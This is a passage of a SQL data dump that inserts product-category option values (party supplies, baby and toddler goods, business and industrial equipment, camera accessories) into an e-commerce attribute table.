(817, 817, 0, 'Arts & Entertainment > Party & Celebration > Party Supplies > Party Supply Kits'),
(818, 818, 0, 'Arts & Entertainment > Party & Celebration > Party Supplies > PiÃ±atas'),
(819, 819, 0, 'Arts & Entertainment > Party & Celebration > Party Supplies > Place Card Holders'),
(820, 820, 0, 'Arts & Entertainment > Party & Celebration > Party Supplies > Place Cards'),
(821, 821, 0, 'Arts & Entertainment > Party & Celebration > Party Supplies > Response Cards'),
(822, 822, 0, 'Arts & Entertainment > Party & Celebration > Party Supplies > Sparklers'),
(823, 823, 0, 'Arts & Entertainment > Party & Celebration > Party Supplies > Special Occasion Card Boxes & Holders'),
(824, 824, 0, 'Arts & Entertainment > Party & Celebration > Party Supplies > Spray String'),
(825, 825, 0, 'Arts & Entertainment > Party & Celebration > Special Effects'),
(826, 826, 0, 'Arts & Entertainment > Party & Celebration > Special Effects > Disco Balls'),
(827, 827, 0, 'Arts & Entertainment > Party & Celebration > Special Effects > Fog Machines'),
(828, 828, 0, 'Arts & Entertainment > Party & Celebration > Special Effects > Special Effects Controllers'),
(829, 829, 0, 'Arts & Entertainment > Party & Celebration > Special Effects > Special Effects Light Stands'),
(830, 830, 0, 'Arts & Entertainment > Party & Celebration > Special Effects > Special Effects Lighting'),
(831, 831, 0, 'Arts & Entertainment > Party & Celebration > Trophies & Awards'),
(832, 832, 0, 'Baby & Toddler'),
(833, 833, 0, 'Baby & Toddler > Baby Bathing'),
(834, 834, 0, 'Baby & Toddler > Baby Bathing > Baby Bathtubs & Bath Seats'),
(835, 835, 0, 'Baby & Toddler > Baby Bathing > Shower Visors'),
(836, 836, 0, 'Baby & Toddler > Baby Gift Sets'),
(837, 837, 0, 'Baby & Toddler > Baby Health'),
(838, 838, 0, 'Baby & Toddler > Baby Health > Baby Health & Grooming Kits'),
(839, 839, 0, 'Baby & Toddler > Baby Health > Nasal Aspirators'),
(840, 840, 0, 'Baby & Toddler > Baby Health > Pacifier Clips & Holders'),
(841, 841, 0, 'Baby & Toddler > Baby Health > Pacifier Wipes'),
(842, 842, 0, 'Baby & Toddler > Baby Health > Pacifiers & Teethers'),
(843, 843, 0, 'Baby & Toddler > Baby Safety');
INSERT INTO `eav_attribute_option_value` (`value_id`, `option_id`, `store_id`, `value`) VALUES
(844, 844, 0, 'Baby & Toddler > Baby Safety > Baby & Pet Gate Accessories'),
(845, 845, 0, 'Baby & Toddler > Baby Safety > Baby & Pet Gates'),
(846, 846, 0, 'Baby & Toddler > Baby Safety > Baby Monitors'),
(847, 847, 0, 'Baby & Toddler > Baby Safety > Baby Safety Harnesses & Leashes'),
(848, 848, 0, 'Baby & Toddler > Baby Safety > Baby Safety Locks & Guards'),
(849, 849, 0, 'Baby & Toddler > Baby Safety > Baby Safety Rails'),
(850, 850, 0, 'Baby & Toddler > Baby Toys & Activity Equipment'),
(851, 851, 0, 'Baby & Toddler > Baby Toys & Activity Equipment > Alphabet Toys'),
(852, 852, 0, 'Baby & Toddler > Baby Toys & Activity Equipment > Baby Activity Toys'),
(853, 853, 0, 'Baby & Toddler > Baby Toys & Activity Equipment > Baby Bouncers & Rockers'),
(854, 854, 0, 'Baby & Toddler > Baby Toys & Activity Equipment > Baby Jumpers & Swings'),
(855, 855, 0, 'Baby & Toddler > Baby Toys & Activity Equipment > Baby Mobile Accessories'),
(856, 856, 0, 'Baby & Toddler > Baby Toys & Activity Equipment > Baby Mobiles'),
(857, 857, 0, 'Baby & Toddler > Baby Toys & Activity Equipment > Baby Soothers'),
(858, 858, 0, 'Baby & Toddler > Baby Toys & Activity Equipment > Baby Walkers & Entertainers'),
(859, 859, 0, 'Baby & Toddler > Baby Toys & Activity Equipment > Play Mats & Gyms'),
(860, 860, 0, 'Baby & Toddler > Baby Toys & Activity Equipment > Play Yards'),
(861, 861, 0, 'Baby & Toddler > Baby Toys & Activity Equipment > Push & Pull Toys'),
(862, 862, 0, 'Baby & Toddler > Baby Toys & Activity Equipment > Rattles'),
(863, 863, 0, 'Baby & Toddler > Baby Toys & Activity Equipment > Sorting & Stacking Toys'),
(864, 864, 0, 'Baby & Toddler > Baby Transport'),
(865, 865, 0, 'Baby & Toddler > Baby Transport > Baby & Toddler Car Seats'),
(866, 866, 0, 'Baby & Toddler > Baby Transport > Baby Carriers'),
(867, 867, 0, 'Baby & Toddler > Baby Transport > Baby Strollers'),
(868, 868, 0, 'Baby & Toddler > Baby Transport Accessories'),
(869, 869, 0, 'Baby & Toddler > Baby Transport Accessories > Baby & Toddler Car Seat Accessories'),
(870, 870, 0, 'Baby & Toddler > Baby Transport Accessories > Baby Carrier Accessories'),
(871, 871, 0, 'Baby & Toddler > Baby Transport Accessories > Baby Stroller Accessories'),
(872, 872, 0, 'Baby & Toddler > Baby Transport Accessories > Baby Transport Liners & Sacks'),
(873, 873, 0, 'Baby & Toddler > Baby Transport Accessories > Shopping Cart & High Chair Covers'),
(874, 874, 0, 'Baby & Toddler > Diapering'),
(875, 875, 0, 'Baby & Toddler > Diapering > Baby Wipe Dispensers & Warmers'),
(876, 876, 0, 'Baby & Toddler > Diapering > Baby Wipes'),
(877, 877, 0, 'Baby & Toddler > Diapering > Changing Mat & Tray Covers'),
(878, 878, 0, 'Baby & Toddler > Diapering > Changing Mats & Trays'),
(879, 879, 0, 'Baby & Toddler > Diapering > Diaper Kits'),
(880, 880, 0, 'Baby & Toddler > Diapering > Diaper Liners'),
(881, 881, 0, 'Baby & Toddler > Diapering > Diaper Organizers'),
(882, 882, 0, 'Baby & Toddler > Diapering > Diaper Pail Accessories'),
(883, 883, 0, 'Baby & Toddler > Diapering > Diaper Pails'),
(884, 884, 0, 'Baby & Toddler > Diapering > Diaper Rash Treatments'),
(885, 885, 0, 'Baby & Toddler > Diapering > Diaper Wet Bags'),
(886, 886, 0, 'Baby & Toddler > Diapering > Diapers'),
(887, 887, 0, 'Baby & Toddler > Nursing & Feeding'),
(888, 888, 0, 'Baby & Toddler > Nursing & Feeding > Baby & Toddler Food'),
(889, 889, 0, 'Baby & Toddler > Nursing & Feeding > Baby & Toddler Food > Baby Cereal'),
(890, 890, 0, 'Baby & Toddler > Nursing & Feeding > Baby & Toddler Food > Baby Drinks'),
(891, 891, 0, 'Baby & Toddler > Nursing & Feeding > Baby & Toddler Food > Baby Food'),
(892, 892, 0, 'Baby & Toddler > Nursing & Feeding > Baby & Toddler Food > Baby Formula'),
(893, 893, 0, 'Baby & Toddler > Nursing & Feeding > Baby & Toddler Food > Baby Snacks'),
(894, 894, 0, 'Baby & Toddler > Nursing & Feeding > Baby & Toddler Food > Toddler Nutrition Drinks & Shakes'),
(895, 895, 0, 'Baby & Toddler > Nursing & Feeding > Baby Bottle Nipples & Liners'),
(896, 896, 0, 'Baby & Toddler > Nursing & Feeding > Baby Bottles'),
(897, 897, 0, 'Baby & Toddler > Nursing & Feeding > Baby Care Timers'),
(898, 898, 0, 'Baby & Toddler > Nursing & Feeding > Bibs'),
(899, 899, 0, 'Baby & Toddler > Nursing & Feeding > Bottle Warmers & Sterilizers'),
(900, 900, 0, 'Baby & Toddler > Nursing & Feeding > Breast Milk Storage Containers'),
(901, 901, 0, 'Baby & Toddler > Nursing & Feeding > Breast Pump Accessories'),
(902, 902, 0, 'Baby & Toddler > Nursing & Feeding > Breast Pumps'),
(903, 903, 0, 'Baby & Toddler > Nursing & Feeding > Burp Cloths'),
(904, 904, 0, 'Baby & Toddler > Nursing & Feeding > Nursing Covers'),
(905, 905, 0, 'Baby & Toddler > Nursing & Feeding > Nursing Pads & Shields'),
(906, 906, 0, 'Baby & Toddler > Nursing & Feeding > Nursing Pillow Covers'),
(907, 907, 0, 'Baby & Toddler > Nursing & Feeding > Nursing Pillows'),
(908, 908, 0, 'Baby & Toddler > Nursing & Feeding > Sippy Cups'),
(909, 909, 0, 'Baby & Toddler > Potty Training'),
(910, 910, 0, 'Baby & Toddler > Potty Training > Potty Seats'),
(911, 911, 0, 'Baby & Toddler > Potty Training > Potty Training Kits'),
(912, 912, 0, 'Baby & Toddler > Swaddling & Receiving Blankets'),
(913, 913, 0, 'Business & Industrial'),
(914, 914, 0, 'Business & Industrial > Advertising & Marketing'),
(915, 915, 0, 'Business & Industrial > Advertising & Marketing > Brochures'),
(916, 916, 0, 'Business & Industrial > Advertising & Marketing > Trade Show Counters'),
(917, 917, 0, 'Business & Industrial > Advertising & Marketing > Trade Show Displays'),
(918, 918, 0, 'Business & Industrial > Agriculture'),
(919, 919, 0, 'Business & Industrial > Agriculture > Animal Husbandry'),
(920, 920, 0, 'Business & Industrial > Agriculture > Animal Husbandry > Egg Incubators'),
(921, 921, 0, 'Business & Industrial > Agriculture > Animal Husbandry > Livestock Feed'),
(922, 922, 0, 'Business & Industrial > Agriculture > Animal Husbandry > Livestock Feeders & Waterers'),
(923, 923, 0, 'Business & Industrial > Agriculture > Animal Husbandry > Livestock Halters'),
(924, 924, 0, 'Business & Industrial > Automation Control Components'),
(925, 925, 0, 'Business & Industrial > Automation Control Components > Programmable Logic Controllers'),
(926, 926, 0, 'Business & Industrial > Automation Control Components > Variable Frequency & Adjustable Speed Drives'),
(927, 927, 0, 'Business & Industrial > Construction'),
(928, 928, 0, 'Business & Industrial > Construction > Surveying'),
(929, 929, 0, 'Business & Industrial > Construction > Traffic Cones & Barrels'),
(930, 930, 0, 'Business & Industrial > Dentistry'),
(931, 931, 0, 'Business & Industrial > Dentistry > Dental Cement'),
(932, 932, 0, 'Business & Industrial > Dentistry > Dental Tools'),
(933, 933, 0, 'Business & Industrial > Dentistry > Dental Tools > Dappen Dishes'),
(934, 934, 0, 'Business & Industrial > Dentistry > Dental Tools > Dental Mirrors'),
(935, 935, 0, 'Business & Industrial > Dentistry > Dental Tools > Dental Tool Sets'),
(936, 936, 0, 'Business & Industrial > Dentistry > Dental Tools > Prophy Cups'),
(937, 937, 0, 'Business & Industrial > Dentistry > Dental Tools > Prophy Heads'),
(938, 938, 0, 'Business & Industrial > Dentistry > Prophy Paste'),
(939, 939, 0, 'Business & Industrial > Film & Television'),
(940, 940, 0, 'Business & Industrial > Finance & Insurance'),
(941, 941, 0, 'Business & Industrial > Finance & Insurance > Bullion'),
(942, 942, 0, 'Business & Industrial > Food Service'),
(943, 943, 0, 'Business & Industrial > Food Service > Bakery Boxes'),
(944, 944, 0, 'Business & Industrial > Food Service > Bus Tubs'),
(945, 945, 0, 'Business & Industrial > Food Service > Check Presenters'),
(946, 946, 0, 'Business & Industrial > Food Service > Concession Food Containers'),
(947, 947, 0, 'Business & Industrial > Food Service > Disposable Lids'),
(948, 948, 0, 'Business & Industrial > Food Service > Disposable Serveware'),
(949, 949, 0, 'Business & Industrial > Food Service > Disposable Serveware > Disposable Serving Trays'),
(950, 950, 0, 'Business & Industrial > Food Service > Disposable Tableware'),
(951, 951, 0, 'Business & Industrial > Food Service > Disposable Tableware > Disposable Bowls'),
(952, 952, 0, 'Business & Industrial > Food Service > Disposable Tableware > Disposable Cups'),
(953, 953, 0, 'Business & Industrial > Food Service > Disposable Tableware > Disposable Cutlery'),
(954, 954, 0, 'Business & Industrial > Food Service > Disposable Tableware > Disposable Plates'),
(955, 955, 0, 'Business & Industrial > Food Service > Food Service Baskets'),
(956, 956, 0, 'Business & Industrial > Food Service > Food Service Carts'),
(957, 957, 0, 'Business & Industrial > Food Service > Food Washers & Dryers'),
(958, 958, 0, 'Business & Industrial > Food Service > Hot Dog Rollers'),
(959, 959, 0, 'Business & Industrial > Food Service > Ice Bins'),
(960, 960, 0, 'Business & Industrial > Food Service > Plate & Dish Warmers'),
(961, 961, 0, 'Business & Industrial > Food Service > Sneeze Guards'),
(962, 962, 0, 'Business & Industrial > Food Service > Take-Out Containers'),
(963, 963, 0, 'Business & Industrial > Food Service > Tilt Skillets'),
(964, 964, 0, 'Business & Industrial > Food Service > Vending Machines'),
(965, 965, 0, 'Business & Industrial > Forestry & Logging'),
(966, 966, 0, 'Business & Industrial > Hairdressing & Cosmetology'),
(967, 967, 0, 'Business & Industrial > Hairdressing & Cosmetology > Hairdressing Capes & Neck Covers'),
(968, 968, 0, 'Business & Industrial > Hairdressing & Cosmetology > Pedicure Chairs'),
(969, 969, 0, 'Business & Industrial > Hairdressing & Cosmetology > Salon Chairs'),
(970, 970, 0, 'Business & Industrial > Heavy Machinery'),
(971, 971, 0, 'Business & Industrial > Heavy Machinery > Chippers'),
(972, 972, 0, 'Business & Industrial > Hotel & Hospitality'),
(973, 973, 0, 'Business & Industrial > Industrial Storage'),
(974, 974, 0, 'Business & Industrial > Industrial Storage > Industrial Cabinets'),
(975, 975, 0, 'Business & Industrial > Industrial Storage > Industrial Shelving'),
(976, 976, 0, 'Business & Industrial > Industrial Storage > Shipping Containers'),
(977, 977, 0, 'Business & Industrial > Industrial Storage > Wire Partitions, Enclosures & Doors'),
(978, 978, 0, 'Business & Industrial > Industrial Storage Accessories'),
(979, 979, 0, 'Business & Industrial > Janitorial Carts & Caddies'),
(980, 980, 0, 'Business & Industrial > Law Enforcement'),
(981, 981, 0, 'Business & Industrial > Law Enforcement > Cuffs'),
(982, 982, 0, 'Business & Industrial > Law Enforcement > Metal Detectors'),
(983, 983, 0, 'Business & Industrial > Manufacturing'),
(984, 984, 0, 'Business & Industrial > Material Handling'),
(985, 985, 0, 'Business & Industrial > Material Handling > Conveyors'),
(986, 986, 0, 'Business & Industrial > Material Handling > Lifts & Hoists'),
(987, 987, 0, 'Business & Industrial > Material Handling > Lifts & Hoists > Hoists, Cranes & Trolleys'),
(988, 988, 0, 'Business & Industrial > Material Handling > Lifts & Hoists > Jacks & Lift Trucks'),
(989, 989, 0, 'Business & Industrial > Material Handling > Lifts & Hoists > Personnel Lifts'),
(990, 990, 0, 'Business & Industrial > Material Handling > Lifts & Hoists > Pulleys, Blocks & Sheaves'),
(991, 991, 0, 'Business & Industrial > Material Handling > Lifts & Hoists > Winches'),
(992, 992, 0, 'Business & Industrial > Material Handling > Pallets & Loading Platforms'),
(993, 993, 0, 'Business & Industrial > Medical'),
(994, 994, 0, 'Business & Industrial > Medical > Hospital Curtains'),
(995, 995, 0, 'Business & Industrial > Medical > Hospital Gowns'),
(996, 996, 0, 'Business & Industrial > Medical > Medical Bedding'),
(997, 997, 0, 'Business & Industrial > Medical > Medical Equipment'),
(998, 998, 0, 'Business & Industrial > Medical > Medical Equipment > Automated External Defibrillators'),
(999, 999, 0, 'Business & Industrial > Medical > Medical Equipment > Gait Belts'),
(1000, 1000, 0, 'Business & Industrial > Medical > Medical Equipment > Medical Reflex Hammers & Tuning Forks'),
(1001, 1001, 0, 'Business & Industrial > Medical > Medical Equipment > Medical Stretchers & Gurneys'),
(1002, 1002, 0, 'Business & Industrial > Medical > Medical Equipment > Otoscopes & Ophthalmoscopes'),
(1003, 1003, 0, 'Business & Industrial > Medical > Medical Equipment > Patient Lifts'),
(1004, 1004, 0, 'Business & Industrial > Medical > Medical Equipment > Stethoscopes'),
(1005, 1005, 0, 'Business & Industrial > Medical > Medical Equipment > Vital Signs Monitor Accessories'),
(1006, 1006, 0, 'Business & Industrial > Medical > Medical Equipment > Vital Signs Monitors'),
(1007, 1007, 0, 'Business & Industrial > Medical > Medical Furniture'),
(1008, 1008, 0, 'Business & Industrial > Medical > Medical Furniture > Chiropractic Tables'),
(1009, 1009, 0, 'Business & Industrial > Medical > Medical Furniture > Examination Chairs & Tables'),
(1010, 1010, 0, 'Business & Industrial > Medical > Medical Furniture > Homecare & Hospital Beds'),
(1011, 1011, 0, 'Business & Industrial > Medical > Medical Furniture > Medical Cabinets'),
(1012, 1012, 0, 'Business & Industrial > Medical > Medical Furniture > Medical Carts'),
(1013, 1013, 0, 'Business & Industrial > Medical > Medical Furniture > Medical Carts > Crash Carts'),
(1014, 1014, 0, 'Business & Industrial > Medical > Medical Furniture > Medical Carts > IV Poles & Carts'),
(1015, 1015, 0, 'Business & Industrial > Medical > Medical Furniture > Surgical Tables'),
(1016, 1016, 0, 'Business & Industrial > Medical > Medical Instruments'),
(1017, 1017, 0, 'Business & Industrial > Medical > Medical Instruments > Medical Forceps'),
(1018, 1018, 0, 'Business & Industrial > Medical > Medical Instruments > Scalpel Blades'),
(1019, 1019, 0, 'Business & Industrial > Medical > Medical Instruments > Scalpels'),
(1020, 1020, 0, 'Business & Industrial > Medical > Medical Instruments > Surgical Needles & Sutures'),
(1021, 1021, 0, 'Business & Industrial > Medical > Medical Supplies'),
(1022, 1022, 0, 'Business & Industrial > Medical > Medical Supplies > Disposable Gloves'),
(1023, 1023, 0, 'Business & Industrial > Medical > Medical Supplies > Finger Cots'),
(1024, 1024, 0, 'Business & Industrial > Medical > Medical Supplies > Medical Needles & Syringes'),
(1025, 1025, 0, 'Business & Industrial > Medical > Medical Supplies > Ostomy Supplies'),
(1026, 1026, 0, 'Business & Industrial > Medical > Medical Supplies > Tongue Depressors'),
(1027, 1027, 0, 'Business & Industrial > Medical > Medical Teaching Equipment'),
(1028, 1028, 0, 'Business & Industrial > Medical > Medical Teaching Equipment > Medical & Emergency Response Training Mannequins'),
(1029, 1029, 0, 'Business & Industrial > Medical > Scrub Caps'),
(1030, 1030, 0, 'Business & Industrial > Medical > Scrubs'),
(1031, 1031, 0, 'Business & Industrial > Medical > Surgical Gowns'),
(1032, 1032, 0, 'Business & Industrial > Mining & Quarrying'),
(1033, 1033, 0, 'Business & Industrial > Piercing & Tattooing'),
(1034, 1034, 0, 'Business & Industrial > Piercing & Tattooing > Piercing Supplies'),
(1035, 1035, 0, 'Business & Industrial > Piercing & Tattooing > Piercing Supplies > Piercing Needles'),
(1036, 1036, 0, 'Business & Industrial > Piercing & Tattooing > Tattooing Supplies'),
(1037, 1037, 0, 'Business & Industrial > Piercing & Tattooing > Tattooing Supplies > Tattoo Cover-Ups'),
(1038, 1038, 0, 'Business & Industrial > Piercing & Tattooing > Tattooing Supplies > Tattooing Inks'),
(1039, 1039, 0, 'Business & Industrial > Piercing & Tattooing > Tattooing Supplies > Tattooing Machines'),
(1040, 1040, 0, 'Business & Industrial > Piercing & Tattooing > Tattooing Supplies > Tattooing Needles'),
(1041, 1041, 0, 'Business & Industrial > Retail'),
(1042, 1042, 0, 'Business & Industrial > Retail > Clothing Display Racks'),
(1043, 1043, 0, 'Business & Industrial > Retail > Display Mannequins'),
(1044, 1044, 0, 'Business & Industrial > Retail > Mannequin Parts'),
(1045, 1045, 0, 'Business & Industrial > Retail > Money Handling'),
(1046, 1046, 0, 'Business & Industrial > Retail > Money Handling > Banknote Verifiers'),
(1047, 1047, 0, 'Business & Industrial > Retail > Money Handling > Cash Register & POS Terminal Accessories'),
(1048, 1048, 0, 'Business & Industrial > Retail > Money Handling > Cash Register & POS Terminal Accessories > Cash Drawers & Trays'),
(1049, 1049, 0, 'Business & Industrial > Retail > Money Handling > Cash Register & POS Terminal Accessories > Credit Card Terminals'),
(1050, 1050, 0, 'Business & Industrial > Retail > Money Handling > Cash Register & POS Terminal Accessories > Signature Capture Pads'),
(1051, 1051, 0, 'Business & Industrial > Retail > Money Handling > Cash Registers & POS Terminals'),
(1052, 1052, 0, 'Business & Industrial > Retail > Money Handling > Coin & Bill Counters'),
(1053, 1053, 0, 'Business & Industrial > Retail > Money Handling > Money Changers'),
(1054, 1054, 0, 'Business & Industrial > Retail > Money Handling > Money Deposit Bags'),
(1055, 1055, 0, 'Business & Industrial > Retail > Money Handling > Paper Coin Wrappers & Bill Straps'),
(1056, 1056, 0, 'Business & Industrial > Retail > Paper & Plastic Shopping Bags'),
(1057, 1057, 0, 'Business & Industrial > Retail > Pricing Guns'),
(1058, 1058, 0, 'Business & Industrial > Retail > Retail Display Cases'),
(1059, 1059, 0, 'Business & Industrial > Retail > Retail Display Props & Models'),
(1060, 1060, 0, 'Business & Industrial > Science & Laboratory'),
(1061, 1061, 0, 'Business & Industrial > Science & Laboratory > Biochemicals'),
(1062, 1062, 0, 'Business & Industrial > Science & Laboratory > Dissection Kits'),
(1063, 1063, 0, 'Business & Industrial > Science & Laboratory > Laboratory Chemicals'),
(1064, 1064, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment'),
(1065, 1065, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Autoclaves'),
(1066, 1066, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Centrifuges'),
(1067, 1067, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Dry Ice Makers'),
(1068, 1068, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Freeze-Drying Machines'),
(1069, 1069, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Laboratory Blenders'),
(1070, 1070, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Laboratory Freezers'),
(1071, 1071, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Laboratory Funnels'),
(1072, 1072, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Laboratory Hot Plates'),
(1073, 1073, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Laboratory Ovens'),
(1074, 1074, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Microscope Accessories'),
(1075, 1075, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Microscope Accessories > Microscope Cameras'),
(1076, 1076, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Microscope Accessories > Microscope Eyepieces & Adapters'),
(1077, 1077, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Microscope Accessories > Microscope Objective Lenses'),
(1078, 1078, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Microscope Accessories > Microscope Replacement Bulbs'),
(1079, 1079, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Microscope Accessories > Microscope Slides'),
(1080, 1080, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Microscopes'),
(1081, 1081, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Microtomes'),
(1082, 1082, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Spectrometer Accessories'),
(1083, 1083, 0, 'Business & Industrial > Science & Laboratory > Laboratory Equipment > Spectrometers'),
(1084, 1084, 0, 'Business & Industrial > Science & Laboratory > Laboratory Specimens'),
(1085, 1085, 0, 'Business & Industrial > Science & Laboratory > Laboratory Supplies'),
(1086, 1086, 0, 'Business & Industrial > Science & Laboratory > Laboratory Supplies > Beakers'),
(1087, 1087, 0, 'Business & Industrial > Science & Laboratory > Laboratory Supplies > Graduated Cylinders'),
(1088, 1088, 0, 'Business & Industrial > Science & Laboratory > Laboratory Supplies > Laboratory Flasks'),
(1089, 1089, 0, 'Business & Industrial > Science & Laboratory > Laboratory Supplies > Petri Dishes'),
(1090, 1090, 0, 'Business & Industrial > Science & Laboratory > Laboratory Supplies > Pipettes'),
(1091, 1091, 0, 'Business & Industrial > Science & Laboratory > Laboratory Supplies > Test Tube Racks'),
(1092, 1092, 0, 'Business & Industrial > Science & Laboratory > Laboratory Supplies > Test Tubes'),
(1093, 1093, 0, 'Business & Industrial > Science & Laboratory > Laboratory Supplies > Wash Bottles'),
(1094, 1094, 0, 'Business & Industrial > Signage'),
(1095, 1095, 0, 'Business & Industrial > Signage > Business Hour Signs'),
(1096, 1096, 0, 'Business & Industrial > Signage > Digital Signs'),
(1097, 1097, 0, 'Business & Industrial > Signage > Electric Signs'),
(1098, 1098, 0, 'Business & Industrial > Signage > Electric Signs > LED Signs'),
(1099, 1099, 0, 'Business & Industrial > Signage > Electric Signs > Neon Signs'),
(1100, 1100, 0, 'Business & Industrial > Signage > Emergency & Exit Signs'),
(1101, 1101, 0, 'Business & Industrial > Signage > Facility Identification Signs'),
(1102, 1102, 0, 'Business & Industrial > Signage > Open & Closed Signs'),
(1103, 1103, 0, 'Business & Industrial > Signage > Parking Signs & Permits'),
(1104, 1104, 0, 'Business & Industrial > Signage > Policy Signs'),
(1105, 1105, 0, 'Business & Industrial > Signage > Retail & Sale Signs'),
(1106, 1106, 0, 'Business & Industrial > Signage > Road & Traffic Signs'),
(1107, 1107, 0, 'Business & Industrial > Signage > Safety & Warning Signs'),
(1108, 1108, 0, 'Business & Industrial > Signage > Security Signs'),
(1109, 1109, 0, 'Business & Industrial > Signage > Sidewalk & Yard Signs'),
(1110, 1110, 0, 'Business & Industrial > Work Safety Protective Gear'),
(1111, 1111, 0, 'Business & Industrial > Work Safety Protective Gear > Bullet Proof Vests'),
(1112, 1112, 0, 'Business & Industrial > Work Safety Protective Gear > Gas Mask & Respirator Accessories'),
(1113, 1113, 0, 'Business & Industrial > Work Safety Protective Gear > Hardhats'),
(1114, 1114, 0, 'Business & Industrial > Work Safety Protective Gear > Hazardous Material Suits'),
(1115, 1115, 0, 'Business & Industrial > Work Safety Protective Gear > Protective Aprons'),
(1116, 1116, 0, 'Business & Industrial > Work Safety Protective Gear > Protective Eyewear'),
(1117, 1117, 0, 'Business & Industrial > Work Safety Protective Gear > Protective Masks'),
(1118, 1118, 0, 'Business & Industrial > Work Safety Protective Gear > Protective Masks > Dust Masks'),
(1119, 1119, 0, 'Business & Industrial > Work Safety Protective Gear > Protective Masks > Fireman\'s Masks'),
(1120, 1120, 0, 'Business & Industrial > Work Safety Protective Gear > Protective Masks > Gas Masks & Respirators'),
(1121, 1121, 0, 'Business & Industrial > Work Safety Protective Gear > Protective Masks > Medical Masks'),
(1122, 1122, 0, 'Business & Industrial > Work Safety Protective Gear > Safety Gloves'),
(1123, 1123, 0, 'Business & Industrial > Work Safety Protective Gear > Safety Knee Pads'),
(1124, 1124, 0, 'Business & Industrial > Work Safety Protective Gear > Welding Helmets'),
(1125, 1125, 0, 'Business & Industrial > Work Safety Protective Gear > Work Safety Harnesses'),
(1126, 1126, 0, 'Business & Industrial > Work Safety Protective Gear > Work Safety Tethers'),
(1127, 1127, 0, 'Cameras & Optics'),
(1128, 1128, 0, 'Cameras & Optics > Camera & Optic Accessories'),
(1129, 1129, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera & Optic Replacement Cables'),
(1130, 1130, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera & Video Camera Lenses'),
(1131, 1131, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera & Video Camera Lenses > Camera Lenses'),
(1132, 1132, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera & Video Camera Lenses > Surveillance Camera Lenses'),
(1133, 1133, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera & Video Camera Lenses > Video Camera Lenses'),
(1134, 1134, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Lens Accessories'),
(1135, 1135, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Lens Accessories > Lens & Filter Adapter Rings'),
(1136, 1136, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Lens Accessories > Lens Bags'),
(1137, 1137, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Lens Accessories > Lens Caps'),
(1138, 1138, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Lens Accessories > Lens Converters'),
(1139, 1139, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Lens Accessories > Lens Filters'),
(1140, 1140, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Lens Accessories > Lens Hoods'),
(1141, 1141, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories'),
(1142, 1142, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Accessory Sets'),
(1143, 1143, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Bags & Cases'),
(1144, 1144, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Body Replacement Panels & Doors'),
(1145, 1145, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Digital Backs'),
(1146, 1146, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Film'),
(1147, 1147, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Flash Accessories'),
(1148, 1148, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Flashes'),
(1149, 1149, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Focus Devices'),
(1150, 1150, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Gears'),
(1151, 1151, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Grips'),
(1152, 1152, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Image Sensors'),
(1153, 1153, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Lens Zoom Units'),
(1154, 1154, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Remote Controls'),
(1155, 1155, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Replacement Buttons & Knobs'),
(1156, 1156, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Replacement Screens & Displays'),
(1157, 1157, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Silencers & Sound Blimps'),
(1158, 1158, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Stabilizers & Supports'),
(1159, 1159, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Straps'),
(1160, 1160, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Camera Sun Hoods & Viewfinder Attachments'),
(1161, 1161, 0, 'Cameras & Optics > Camera & Optic Accessories > Camera Parts & Accessories > Flash Brackets'),
